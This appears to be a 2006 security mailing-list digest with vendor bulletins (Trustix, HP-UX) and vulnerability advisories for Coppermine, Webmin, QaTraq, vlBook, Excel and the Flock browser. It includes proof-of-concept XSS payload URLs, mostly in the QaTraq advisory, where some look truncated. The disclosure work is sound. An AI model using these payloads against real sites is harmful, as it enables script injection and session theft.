3.0/rpms/kernel-utils-2.6.17.1-1tr.i586.rpm 50b0ae6413722d2a1bdae33351681f91 3.0/rpms/netpbm-10.30-2tr.i586.rpm 3920883cc71f6cb001fc6af104ccc683 3.0/rpms/netpbm-devel-10.30-2tr.i586.rpm 4a18575d3cec2782273cdfd273d83cc7 3.0/rpms/netpbm-progs-10.30-2tr.i586.rpm 005b2a0731b52605636428d177347f89 2.2/rpms/netpbm-10.30-2tr.i586.rpm f8f08954e91ea373d461baf65b0a85d1 2.2/rpms/netpbm-devel-10.30-2tr.i586.rpm ac86b308ccf229ee6715619b38b07fac 2.2/rpms/netpbm-progs-10.30-2tr.i586.rpm - -- Trustix Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEm9gei8CEzsK9IksRAgXJAKCVD4qbnQLqeHaWorWTfbxcYB2OOgCghASq 1Ke12Cjkrp5R5OeqqkS/W9M= =e1Sg -END PGP SIGNATURE-
RE: Bypassing of web filters by using ASCII
Amit Klein wrote Thursday, June 22, 2006 3:47 AM > So in order to exploit this in HTML over HTTP, the attacker needs to either add/modify the Content-Type response header, or to add/modify the META tag in the HTML page. There are other ways that might carry a bigger injection threat: Style sheet: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml /reference/properties/charset_1.asp Object property: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml /reference/properties/charset.asp By extension, it should also work for inline styles.
[security bulletin] HPSBUX02127 SSRT051056 - rev.1 HP-UX Kernel Local Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00705283 Version: 1 HPSBUX02127 SSRT051056 - rev.1 HP-UX Kernel Local Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-06-20 Last Updated: 2006-06-21 Potential Security Impact: Local Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX. The vulnerability could be exploited by a local user to create a Denial of Service (DoS). References: none SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.11, B.11.23 BACKGROUND To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.00 == OS-Core.CORE2-KRN action: install patch PHKL_34192 or subsequent HP-UX B.11.11 OS-Core.CORE2-KRN action: install patch PHKL_34193 or subsequent HP-UX B.11.23 == OS-Core.CORE2-KRN action: install patch PHKL_34194 or subsequent END AFFECTED VERSIONS RESOLUTION HP is providing the following patches to resolve this potential vulnerability. These patches can be downloaded from http://itrc.hp.com PHKL_34192 for B.11.00 PHKL_34193 for B.11.11 PHKL_34194 for B.11.23 MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA HISTORY: Version: 1 (rev.1) - 21 June 2006 Initial release Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&; langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." (c)Copyright 2006 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of
[KAPDA]Coppermine 1.4.8~Parameter Cleanup System ByPass~Registering Global Varables
ORIGINAL ADVISORY: http://myimei.com/security/2006-06-20/coppermine-148parameter-cleanup-system-bypassregistering-global-varables.html VENDOR INFORMED -Summary- Software: CPG Coppermine Photo Gallery Sowtwares Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.8.stable Class: Remote Status: Unpatched Exploit: Available Discovered by: imei addmimistrator Risk Level: Mediume Description Coppermine Photo Gallery has a logical design fault that will result to bypassing anti-XSS-InjectionRegGlobal-System. SEE ORIGINAL ADVISORY FOR MORE DETAILES
QaTraq 6.5 RC: Multiple XSS Vulnerabilities
===
QaTraq 6.5 RC: Multiple XSS Vulnerabilities
===
Technical University of Vienna Security Advisory
TUVSA-0606-001, June 23, 2006
===
Affected applications
--
QaTraq (http://sourceforge.net/projects/qatraq/)
Versions 6.5 RC and prior.
Description
There are a number of reflected XSS vulnerabilities, some of which are also
stored XSS vulnerabilities and perhaps even SQL injection vulnerabilitities.
The affected program points as well as demo exploits are given below. The
exploits have been tested with the user being logged in as admin, and
register_globals being active. It is possible that some vulnerabilities do not
require register_globals to be enabled, although we have not tested this. Some
of the parameters in the given sample exploits (mainly "id" params) have to be
adjusted to the given installation to match existing database entries.
In addition to program points for which exploits are given, we have listed
about 200 places that are very similar in structure. Although we have not
explicitly tested them with exploits, we suspect that they are vulnerable as
well.
top.inc
-
line 1005
http://localhost/qatraq65rc/queries_view_search.php?link_print='">alert('hi')
line 1007
http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='">alert('hi')
line 1020
http://localhost/qatraq65rc/queries_view_search.php?link_sql='">alert('hi')
line 1041
http://localhost/qatraq65rc/queries_view_search.php?link_next=";>alert('hi')
line 1054
http://localhost/qatraq65rc/queries_view_search.php?link_prev=";>alert('hi')
line 1067
http://localhost/qatraq65rc/queries_view_search.php?link_list=";>alert('hi')
components_copy_content.php
-
line 233
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=alert('hi')
[product_id and id (= component id) must exist in the database]
line 238
- use the attack page:
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1";>
line 260
- analogous to 238:
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1";>
components_modify_content.php
---
line 213
http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg=alert('hi')
line 218
http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1";>
line 240
http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1";>
components_new_content.php
-
line 188
http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg=alert('hi')
line 193
http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1";>
line 215
http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1";>
design_copy_content.php
-
line 262
- use this page [plan_id must exist in the database]:
http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>
line 276
http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>
line 313
http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>
design_copy_plan_search.php
-
line 106
http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1";>
line 107
http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1";>
design_modify_content.php
---
line 282
http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1";>
line 298
- $new_doc_id is constructed from $major_version and $minor_version on line
189; these two are only set if POST['version_increment'] is set; use this page
[and watch for suitable id]:
http://localhost/qatraq65rc/design_modify_content.php?id=7";>
line 311
- $new_version, analogous to 298
line 354
http://localhost/qatraq65rc/design_modify_content.php?id=10";>
design_new_content.php
line 226
http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>
line 240
http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>
line 276
http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>
design_new_search.php
---
line 99
http://localhost/qatraq65rc/design_new_search.php?plan_name=";>alert('hi')
line 100
http://localhost/qatraq65rc/design_new_search.php?plan_desc=";>alert('hi')
download.php
-
line 31
http://localhost/qatraq65rc/download.php?file_name=alert('hi')
login.php
--
line 88
http://localhost/qatraq65rc/login.php?username=";>a
[SNS Advisory No.88] Webmin Directory Traversal Vulnerability
-- SNS Advisory No.88 Webmin Directory Traversal Vulnerability Problem first discovered on: Sun, 04 Jun 2006 Published on: Fri, 23 Jun 2006 -- Severity Level: --- Medium Overview: - Webmin for Windows contains directory traversal vulnerability that allows remote attackers to download arbitrary files without authentication. Problem Description: Webmin is a web-based system administration tool for Unix, MacOS X and Windows platform. Webmin 1.270 and earlier versions does not properly handle "\" (backslash). On Windows platform, this allows attackers to access outside of the public directory and files. In default configurations of Webmin, it is required authentication to access almost directories under top page. But there are some directories where is not required authentication to access. For example, the directory which stores the image used before login. Therefore, by exploiting directory traversal vulnerability from these directories, the vulnerability allows remote attackers to download the contents of arbitrary files without authentication. Affected Versions: -- Webmin (on Windows) Version 1.270 and earlier versions Solution: - This problem can be addressed by upgrading Webmin to 1.280 or later. http://www.webmin.com/ Discovered by: -- Keigo Yamazaki (LAC) Thanks to: -- This SNS Advisory is being published in coordination with Information-technology Promotion Agency, Japan (IPA) and JPCERT/CC. http://jvn.jp/jp/JVN%2367974490/index.html http://www.ipa.go.jp/security/vuln/documents/2006/JVN_67974490_webmin.html Disclaimer: --- The information contained in this advisory may be revised without prior notice and is provided as it is. Users shall take their own risk when taking any actions following reading this advisory. LAC Co., Ltd. shall take no responsibility for any problems, loss or damage caused by, or by the use of information provided here. This advisory can be found at the following URL: http://www.lac.co.jp/business/sns/intelligence/SNSadvisory_e/88_e.html --
vlbook 1.2 XSS Bug
vlBook 1.02 Advisory
Date:
-
2005 June 23
Product:
vlBook 1.02 © 2005
Vendor:
---
http://vlab.info/
Descriptions:
-
The vlbook is a free, open source and light-weight guestbook written in PHP
using flat files to store messages
and settings. It comes with install script for quick and effortless
installation. Features include a WYSIWYG Editor,
template based skins, multilingual support, avatars packs and more.
Exploit(s)/Vulnerability(ies):
--
- XSS Vulnerability -
This product is vulnerable to an XSS Attack. The variable message is not
properly sanitised before being used; so a malicious
people can inject arbitrary XSS code.
PoC 0f XSS:
---
If an attacker put in the field "Message*:" this code:
alert("XSS ATTACK")
Further information:
googledorks: Powered by vlBook 1.02 © 2005
Vendor Status:
--
Informed but I've not received the reply.
Credits:
Omnipresent
[EMAIL PROTECTED]
Re: MS Excel Remote Code Execution POC Exploit
> * Advisories: > * http://www.microsoft.com/technet/security/advisory/921365.mspx > * http://www.securityfocus.com/bid/18422/ There are at least three separate Excel issues that were published in the past week. These references suggest that it's the "zero-day" exploit from last Friday (CVE-2006-3059). However, the Microsoft blog and CERT advisories do not provide any details about that issue, not even about the bug type. So, it's not clear to me whether this is really an exploit for last Friday's zero-day, or if this is actually a brand new vulnerability. Any clarification would be appreciated. - Steve
flock d0s exploit remote. beta 1 (v0.7)
Credit's to n00b..Round 2 of the marquee tag's bug...
ive found a dos in flock web browser and crash's the browser ive provided a
proof of concept :P...
thnx
tested on win xp pro service pack 1..
http://www.flock.com/
flox web browser remote dos exploit by n00b :: http://www.flock.com/
::..
Credit's to n00b..Round {2} of the marquee bug's...
